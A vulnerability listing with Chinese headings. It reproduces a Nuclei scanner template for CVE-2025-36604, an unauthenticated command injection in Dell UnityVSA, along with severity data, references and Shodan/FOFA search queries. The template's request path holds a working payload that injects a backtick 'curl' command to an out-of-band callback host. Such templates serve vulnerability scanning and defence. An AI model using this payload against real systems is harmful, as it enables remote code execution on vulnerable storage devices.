漏洞描述
Dell Unity, version(s) 5.5 and prior, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability.
CVE-2025-36604: Dell UnityVSA < 5.5 - Remote Command Injection
PoC代码[已公开]
id: CVE-2025-36604
info:
name: Dell UnityVSA < 5.5 - Remote Command Injection
author: DhiyaneshDK,watchtowr
severity: critical
description: |
Dell Unity, version(s) 5.5 and prior, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability.
impact: An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to arbitrary command execution.
remediation: |
Update to the latest version beyond 5.5.
reference:
- https://labs.watchtowr.com/its-never-simple-until-it-is-dell-unityvsa-pre-auth-command-injection-cve-2025-36604/
- https://github.com/watchtowrlabs/watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604/blob/main/watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604.py
- https://nvd.nist.gov/vuln/detail/CVE-2025-36604
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-36604
epss-score: 0.18062
epss-percentile: 0.94893
cwe-id: CWE-78
cpe: cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Unisphere"
fofa-query: title="Unisphere"
tags: cve,cve2025,dell,unityvsa,rce,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/misc/`curl${IFS}{{interactsh-url}}`/..;/index.html"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "getUrlVars")'
- 'contains(content_type, "text/html")'
- 'contains(interactsh_protocol, "dns")'
condition: and
# digest: 4b0a00483046022100a63bd8de62297d6eac5cb9a3c5815319b70d1bbcac02d7b7e58ae1500d3ad837022100c78ab7706362413a4c5c3fd29007958191ccbff02b5cafb5a864fbc1e8363821:922c64590222798bb761d5b6d8e72950